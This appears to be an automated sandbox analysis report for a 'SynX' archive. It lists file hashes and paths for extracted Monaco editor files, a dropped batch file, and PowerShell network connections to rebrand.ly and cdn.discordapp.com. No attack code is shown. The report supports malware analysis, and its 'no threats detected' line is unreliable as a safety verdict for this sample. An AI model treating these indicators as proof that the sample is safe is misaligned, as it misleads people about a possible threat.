MD5: 4d83bc1bced6f773423be6f939472cfe
SHA256: 0dee462d5fb231f169f6cbc432465a43fd445c011fe650e29f5fb2bccc31eaae
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.fr.js
text
MD5: d319e61fc6b357b9a5d8e3bbaa44ce3c
SHA256: 7fde40b2b212d274617232de09452c6cb896e8a3c6b9e0b459f067cd07f31a99
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.nls.it.js
text
MD5: a8855a662eb4d3a771fdab7ba6287def
SHA256: f67cec6dbf98c98c834638d20df53c5a770edada7f26ebf6d0b7dfec60f7a4ab
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\editor.main.css
text
MD5: 233217455a3ef3604bf4942024b94f98
SHA256: 2ec118616a1370e7c37342da85834ca1819400c28f83abfcbbb1ef50b51f7701
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\xml\xml.js
text
MD5: 837efa6cbae0c226509b3f496c20660d
SHA256: 01896b21ba9fe9106316197da8118596101b966d4597aa794720f2561cbe15d8
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\contrib\suggest\media\String_16x.svg
image
MD5: 48e754cb54c78a85dcc9aaea9a27847e
SHA256: d1aa361f33564e8f9d527a01a66c7ce35d73f23417432e80ddf51f562770ee79
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\editor\contrib\suggest\media\String_inverse_16x.svg
image
MD5: 6e5c0ce7ec09969f07ea6ee078ef8ad6
SHA256: 7d23c0f30cb9c05c81bb15785a3299772ae3cfbe51f3e04895aa1f23ffbeba5b
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\yaml\yaml.js
text
MD5: a812c4e3188d84d073a481b2cadc21bd
SHA256: 3730024b6d24b2ea2e9794123b038eee4383e9ae94fabd849aceb9596ad9d2d0
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\solidity\solidity.js
text
MD5: 0c117b4dc07c6a0a0d063d1504e04ea6
SHA256: e71c1df85ced6a51254a45152ceb9bab1ec3a003e8e4911ab35c737b52d42ae4
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\sql\sql.js
text
MD5: 4788f14a5c95a359af5ee52efbcf862d
SHA256: d1ab939c0ba1033252787f1f13b503d870ee5784a23a3b0b89857860075c035b
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\st\st.js
text
MD5: 7f3ef65a0f0f0aeedcd64d57f191d7a6
SHA256: 29e530c3a0dae1dc1b630a0867132a2513b1996b7eb0d1f4090336bd6004ff09
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\vb\vb.js
text
MD5: fd92faac5b4b3dfc2aa8cd7deb8efecf
SHA256: 5ca2ef383ccbfd449dceb76db571211374314054e22977bbeb785e2aaf8ecf24
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\swift\swift.js
text
MD5: 1bdd6f185cd2b5f4e11c6fac19e86175
SHA256: 5e9896a1e113b93502a1249b0cc78a844b000b803410a9a956854faac8528366
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\sb\sb.js
text
MD5: 95a88fd3ac1433bc136a792bd892c1d2
SHA256: 51c0bbde8b266514a37f00707c34bab27571b7eb38bddc5a45bb3f987ce5227d
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\rust\rust.js
text
MD5: f48a41336bcc1a195503c7a020ea508c
SHA256: 7c4e77f3bc6f3fb580c1c329f515e30830e6f6352d088b7948f73fa1662a3664
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\scss\scss.js
text
MD5: 3e266f1f8eaaae110c8ae9e31fe5cb41
SHA256: 438f781e751495302a0e2359ea93b54d7f9cba383fb44185d73bc6e2a5a38e81
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\redshift\redshift.js
text
MD5: c08941967ac5ba8cc4a2971b2c888456
SHA256: b461f7951effbf085cd7a090dd4e69e54f812a2543f55a4ecacaee7ef6649bdf
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\razor\razor.js
text
MD5: c87e5b4654c9011e1df9eeaa10fa4379
SHA256: 2ad872aa67a12a578e652762c21136b9c9e2a741c2752d69ef48c2eb22cc621c
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\redis\redis.js
text
MD5: 947b18f3f04fe16fc51beea925aab14b
SHA256: 81d912c3bd211ab866500ebc901eeb628b21e5979587901adece649baff48f30
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\ruby\ruby.js
text
MD5: 9d0eddeae6d9bf3d3d9eebf7858b45bd
SHA256: 5f249877eef9e52f52dbe2bb4b158da3a6f7fc2d267487298d537292596b6089
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\python\python.js
text
MD5: d3618ce8d5aec23fff67ced39c79ebd9
SHA256: 8b98aeb80e1fd053e80cdfbf79437338d8b1081ccbd999c5373da225777296ad
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\pug\pug.js
text
MD5: 4cce0b17d4f7bf474a5101763ec17c9c
SHA256: cdad9f84576583b68a10519c4f23ba36cd4422cbb7a44fded2c99a1e823e8043
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\r\r.js
text
MD5: bb2637578ba902dcd3ea172cf8c7b7ea
SHA256: 710905ba785b707484afed8404c2b092f0b7ca4bf5aa35a7d333a7c07afee712
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\powershell\powershell.js
text
MD5: 25cbb67f273e62a6d0e6dd5c123f5963
SHA256: d47b6e2970b4bbcd0eb8e4ef69eb2052b117e36ab20c68605a1750ad5991eb51
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\postiats\postiats.js
text
MD5: 0c7a2538121071fd75d9f08806500ea3
SHA256: e49fe4654ae374d12dc7a4cb210ba95f490982a014886ede88a0dad3fd99a760
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\php\php.js
text
MD5: fffc04cacea00100299900c7969e44dd
SHA256: af43769fa1bdef70da786c2296c3a5f91552163c78d5c8ede46620a146edda92
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\pgsql\pgsql.js
text
MD5: 7183810944428c812b3f9f4ed4adbb6d
SHA256: a9487e85b74fd293c0131ae9bc181e72baecf5a0a6f8b71e97770d79332c09c0
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\objective-c\objective-c.js
text
MD5: 3ba48944ccda06514bf9723a2308b4c8
SHA256: 35af39baf166f7c2e3c95345b10ec46aa523f98783daa745aef64503019e3253
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\mysql\mysql.js
text
MD5: 6482b3f16ca4f1436d5a5c9b54ab8956
SHA256: 7ba586bf9c623dc23f27a46e95a22342caa1f42d3b19fd9c018eb3b7298206dd
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\msdax\msdax.js
text
MD5: eaa7bff8662633aec211d57fd17cb8ce
SHA256: 6ab13356e083c4334e93d3167bdd17d02552508bfd11ea044c880af3a1dd94f9
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\markdown\markdown.js
text
MD5: caf4799639d5df40dfb1b979ed68af9c
SHA256: eaaf453e0a9f9a604547e564a24e682503189cb9b85c87715bc9b5b6492b6f62
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\lua\lua.js
text
MD5: 8706d861294e09a1f2f7e63d19e5fcb7
SHA256: fc2d6fb52a524a56cd8ac53bfe4bad733f246e76dc73cbec4c61be32d282ac42
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\handlebars\handlebars.js
text
MD5: 3ca7cf83292b56444548f2914c0e1811
SHA256: 31d25588d120e7c79f3332ff3b3c794cebd0554c7578e3bb37b3cac366e4f6c2
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\less\less.js
text
MD5: 696ef3dca27b4f9313deba6f99710154
SHA256: ed8d1a9da4e62d1cffe4c83580c9df57d688e850a45ace72c11bdeb064520a16
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\ini\ini.js
text
MD5: b9252b74381fe17565d494711f4c9093
SHA256: 1f0feeae58c32f6e1f31b78f7e2aab3c91da387e464234c0f55ebff0e77444a2
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\html\html.js
text
MD5: 630fa41f59a189aed68b4db82559de95
SHA256: c717ac0701d3b1e22dc52a0c53608214297e5fab7bc7011cf4e964f2eca9d62f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\java\java.js
text
MD5: 826546e08f178d68e8aa2ab29194c03a
SHA256: 44be702cae05d5844dc1c452f9bd94020007b9e543a765db4e6649278607d218
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\dockerfile\dockerfile.js
text
MD5: e32de981bdaf75e6ffb8fe40bc955a68
SHA256: 65b86fc54e9b35d6cb84f01dfb905680dbcad6605757de1d6bca84e3029889af
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\fsharp\fsharp.js
text
MD5: de122b3bc44a8714f386dc80282dcb12
SHA256: 1390079babc117d3f376735780d98f409f317eb4628d17106642c6933ea1da7f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\go\go.js
text
MD5: 5b4484c914cd97aff4510b803f2517ef
SHA256: 46d1757c3cd3dbc3c7b465a338880144922a1c34c30e36f06ff2db8c2ff75b86
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\css\css.js
text
MD5: 49ad30f1151cfd7a74677fdc6dd13da9
SHA256: bd331fd3bd2c37b0c3150035325f163ac9266bf6d942310764815e676d856d91
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\csp\csp.js
text
MD5: 22ada25d590811dcff4e5f5d698e583b
SHA256: 4b5a5d7d50986b86b00833447e097c0f01a4388ce1765b48e7e371d06e3a4789
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\csharp\csharp.js
text
MD5: f8f841d13c9220e15dcd6bc386b37ba2
SHA256: 6b3be9a86ee8e3202f51745d94d24cc1eefbcf7d9e6d94fbaf70146b084e835f
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\coffee\coffee.js
text
MD5: 9d0c4ac1691eed0a480c3e9246490d29
SHA256: e706c9f8e5c5a0cb01b2f4e4879ec34a050d6eb2a8840284eb7badd9d78099f9
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\bat\bat.js
text
MD5: 4cb475399c4490eea41982dcd6d9653e
SHA256: 9bca42394fe8922fec24b768eeb8ce04692de6fad82f9052d5b7e70f5c6b0f40
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\basic-languages\cpp\cpp.js
text
MD5: 0a16509e6cd0155fb622e785cfe976c7
SHA256: a7c2bea7ca3d9e203a3a286735945fe010c8f4f8d46620386ee8befc6a78b32b
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\vs\base\worker\workerMain.js
text
MD5: 27ead90c7702154755785e0e53398755
SHA256: bdf9433692a08851e13dd58504eef19f51bd2ec7241923a68edf5772e0e53af5
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\Monaco.html
html
MD5: 999896134bd43cefa865f37e514ba62f
SHA256: 1ecdd9529ef5487f92736894d94ff680f6c32ee821615d29c0fc814f3a310b4a
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\globalns.txt
text
MD5: ba56c14634b7ae6fb585be396acf5f03
SHA256: 5cb987e7c87f2f04cdd45f3a474fb2380bbf846534e38f2b485eafc562b7b482
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\globalv.txt
text
MD5: 5cf9f238d4e62c8bcde351651c3a2a45
SHA256: eeb98f2c9911ae8ddd25f1b3be3732000f16788bda60aa962e9f8452012b1062
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\base.txt
text
MD5: 0d834904a252e1ab786f9637bef6819f
SHA256: dbe440c5dee6367ebca919886ffe593246e1e52618e4713373000c9fc77c87cc
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\globalf.txt
text
MD5: 1700df0210cda593d3df64f51b3caaea
SHA256: deae98f86c62749e4b642acb41ea5dfce0caf09bc77036aae82ee814a04ed9e0
3164
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DRa3164.14280\SynX\Monaco\classfunc.txt
text
MD5: bf32e93d11011eb780619b3e17fb824a
SHA256: 519da000de235c331f10660509fab51a1815ace566b8ae5b511b75813922dcb1
3564
BootStrapper.exe
C:\Users\admin\AppData\Local\Temp\D644.tmp\D645.tmp\D646.bat
text
MD5: 1e65389aa72ff2ff12f70acc40c887df
SHA256: 88f72ae9f3e0b060e08a6f69edc935542dd154e86c750cd08e519c80d06bd8c4
2756
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 131dc75f6d4142ca9244945a91a71e8d
SHA256: f17c463c77b5da9e795770a82e0a7fb1023023f44397f6e080721e9811b2a0c4

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests.

Connections

PID Process IP ASN CN Reputation
2756 powershell.exe 34.206.134.255:443 Amazon.com, Inc. US unknown
–– –– 104.16.11.231:443 Cloudflare Inc US shared

DNS requests

Domain IP Reputation
rebrand.ly 34.206.134.255
34.197.0.138
unknown
cdn.discordapp.com 104.16.11.231
104.16.10.231
104.16.9.231
104.16.12.231
104.16.13.231
unknown

Threats

No threats detected.

Debug output strings

No debug info.